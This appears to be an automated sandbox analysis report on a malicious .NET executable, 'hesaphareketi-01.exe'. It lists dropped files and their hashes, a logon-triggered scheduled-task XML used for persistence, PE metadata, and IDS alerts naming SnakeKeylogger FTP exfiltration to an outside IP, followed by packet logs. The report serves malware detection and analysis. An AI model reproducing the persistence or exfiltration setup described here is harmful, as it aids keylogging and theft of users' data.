                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.380747059108785
                                              Encrypted:false
                                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                                              MD5:4D3B8C97355CF67072ABECB12613F72B
                                              SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                                              SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                                              SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                                              Malicious:false
                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1596
                                              Entropy (8bit):5.102225587263902
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLeKaxv:cge7QYrFdOFzOzN33ODOiDdKrsuTKBv
                                              MD5:C76EC0557AEFDA13998ED88B9BD9FB7F
                                              SHA1:47712ACE7C6EB7954D6AA98E55714D926E19AB53
                                              SHA-256:FF80B9CB417C74EDC55F87906CFF520CC6ABCFFEB80158100F8D171A7D4F3C08
                                              SHA-512:34F8681380817C17859B28E67F159B0E927C947DE99104AB9B39E8909ED92771A66441F6EFF0A1CDA6186588AA67FD176396D9D82DBAE81D2E9E103B629206EB
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                              Process:C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1596
                                              Entropy (8bit):5.102225587263902
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLeKaxv:cge7QYrFdOFzOzN33ODOiDdKrsuTKBv
                                              MD5:C76EC0557AEFDA13998ED88B9BD9FB7F
                                              SHA1:47712ACE7C6EB7954D6AA98E55714D926E19AB53
                                              SHA-256:FF80B9CB417C74EDC55F87906CFF520CC6ABCFFEB80158100F8D171A7D4F3C08
                                              SHA-512:34F8681380817C17859B28E67F159B0E927C947DE99104AB9B39E8909ED92771A66441F6EFF0A1CDA6186588AA67FD176396D9D82DBAE81D2E9E103B629206EB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                              Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):797696
                                              Entropy (8bit):7.451821708269546
                                              Encrypted:false
                                              SSDEEP:12288:GTfOxmCKE2pb57IF0kVtn1IyyMgGpT1dl2veI0ay3MxyNALB:GS2t5sF0Gn1TcGB/l2veb8B
                                              MD5:FB1DDD3D10CA671F437C6F2F3C9D6E57
                                              SHA1:7BD24B6B4A1E30C7BD2EC0CFBE886021A902C912
                                              SHA-256:49917F413CBF883715A5F6E5A30CB13ABAFC693EC296751BA8B1BDBC3142E8C5
                                              SHA-512:5EDFB4CCDE93569C171B48EEAC48026BB42D4CDBD791A5833945C5E4D775ABDFB2529B04AAC798FCABC5B1EF91B9EACBB6EA13452B27DB98DBB55569EB337496
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 39%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?+g..............0............../... ...@....@.. ....................................@.....................................O....@..T....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...T....@......................@..@.reloc.......`.......*..............@..B................./......H...........pR......8........*...........................................0.................,.r...ps5...z.o6... . &........,.r...ps7...z....o8....o9...s:.... . &.o;......o<...(=.......+O....+....}X......[...X.....X.....o>.........-...o?....o>....ZY...[...ZX.....X.....o@.........-....oA....*...0............{.....+..*.0............{.....+..*^.(B.......}......}....*.0............{,....+..*.0.............(....o.....+..*...0............{.....+..*.0..^.........}..... .........}.....
                                              Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.451821708269546
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:hesaphareketi-01.exe
                                              File size:797'696 bytes
                                              MD5:fb1ddd3d10ca671f437c6f2f3c9d6e57
                                              SHA1:7bd24b6b4a1e30c7bd2ec0cfbe886021a902c912
                                              SHA256:49917f413cbf883715a5f6e5a30cb13abafc693ec296751ba8b1bdbc3142e8c5
                                              SHA512:5edfb4ccde93569c171b48eeac48026bb42d4cdbd791a5833945c5e4d775abdfb2529b04aac798fcabc5b1ef91b9eacbb6ea13452b27db98dbb55569eb337496
                                              SSDEEP:12288:GTfOxmCKE2pb57IF0kVtn1IyyMgGpT1dl2veI0ay3MxyNALB:GS2t5sF0Gn1TcGB/l2veb8B
                                              TLSH:2B059CD03661AB19DEAD87B8C149DC7483B41E657005FAAE5ED837D738B9320AE08F47
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?+g..............0............../... ...@....@.. ....................................@................................
                                              Icon Hash:26b6dac84c6c3e03
                                              Entrypoint:0x4c2f2e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x672B3FF7 [Wed Nov 6 10:07:51 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              adc al, 00h
                                              add byte ptr [eax], al
                                              adc dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              adc dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              adc byte ptr [eax], al
                                              add byte ptr [eax], al
                                              sldt word ptr [eax]
                                              add byte ptr [esi], cl
                                              add byte ptr [eax], al
                                              add byte ptr [esi], cl
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax], cl
                                              add byte ptr [eax], al
                                              or al, 00h
                                              add byte ptr [eax], al
                                              or al, 00h
                                              add byte ptr [eax], al
                                              or al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              or eax, 0C000000h
                                              add byte ptr [eax], al
                                              add byte ptr [ebx], cl
                                              add byte ptr [eax], al
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc2edc0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x1654.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xc0f740xc10007777e372626a505990aefe8c5a03f9f6False0.7659867835168394data7.469835605712907IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc40000x16540x1800416be5b450448782c5988d8c7769b09dFalse0.4451497395833333data4.61335121878706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xc60000xc0x2001e0ba8b4d46bbf5dd501b0f4a2668c49False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc41180x1200Device independent bitmap graphic, 32 x 64 x 32, image size 00.4939236111111111
                                              RT_GROUP_ICON0xc53180x14data1.0
                                              RT_GROUP_ICON0xc532c0x14data1.05
                                              RT_VERSION0xc53400x314data0.4149746192893401
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-06T17:02:32.729019+01002845532ETPRO MALWARE SnakeKeylogger Exfil via FTP M11192.168.2.65009450.31.176.10321TCP
                                              2024-11-06T17:02:32.729019+01002845532ETPRO MALWARE SnakeKeylogger Exfil via FTP M11192.168.2.65011450.31.176.10321TCP
                                              2024-11-06T17:02:44.333550+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656815193.122.6.16880TCP
                                              2024-11-06T17:02:45.536539+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656815193.122.6.16880TCP
                                              2024-11-06T17:02:46.299399+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656834188.114.96.3443TCP
                                              2024-11-06T17:02:47.224068+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656841193.122.6.16880TCP
                                              2024-11-06T17:02:48.224050+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656843193.122.6.16880TCP
                                              2024-11-06T17:02:48.817798+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656856193.122.6.16880TCP
                                              2024-11-06T17:02:49.559832+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656858188.114.96.3443TCP
                                              2024-11-06T17:02:50.288092+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656843193.122.6.16880TCP
                                              2024-11-06T17:02:51.072384+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656868188.114.96.3443TCP
                                              2024-11-06T17:02:52.005298+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656874193.122.6.16880TCP
                                              2024-11-06T17:02:52.819631+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656880188.114.96.3443TCP
                                              2024-11-06T17:02:53.997145+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656885193.122.6.16880TCP
                                              2024-11-06T17:02:54.797377+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656891188.114.96.3443TCP
                                              2024-11-06T17:02:55.724025+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.656897193.122.6.16880TCP
                                              2024-11-06T17:02:58.359771+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656914188.114.96.3443TCP
                                              2024-11-06T17:03:01.692771+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.656931188.114.96.3443TCP
                                              2024-11-06T17:03:05.137972+01002845535ETPRO MALWARE SnakeKeylogger Exfil via FTP M41192.168.2.65010250.31.176.10334028TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 6, 2024 17:02:36.192918062 CET49674443192.168.2.6173.222.162.64
                                              Nov 6, 2024 17:02:36.193600893 CET49673443192.168.2.6173.222.162.64
                                              Nov 6, 2024 17:02:36.521039963 CET49672443192.168.2.6173.222.162.64
                                              Nov 6, 2024 17:02:38.558278084 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:38.558332920 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:38.558402061 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:38.558738947 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:38.558754921 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.571259975 CET44356796173.222.162.64192.168.2.6
                                              Nov 6, 2024 17:02:39.571373940 CET56796443192.168.2.6173.222.162.64
                                              Nov 6, 2024 17:02:39.699647903 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.699763060 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.702163935 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.702174902 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.702399969 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.711869001 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.759325981 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.940675974 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.940705061 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.940730095 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.940769911 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.940788984 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.940814972 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.940838099 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.955169916 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.955207109 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:39.955288887 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:39.955300093 CET4435680113.107.246.45192.168.2.6
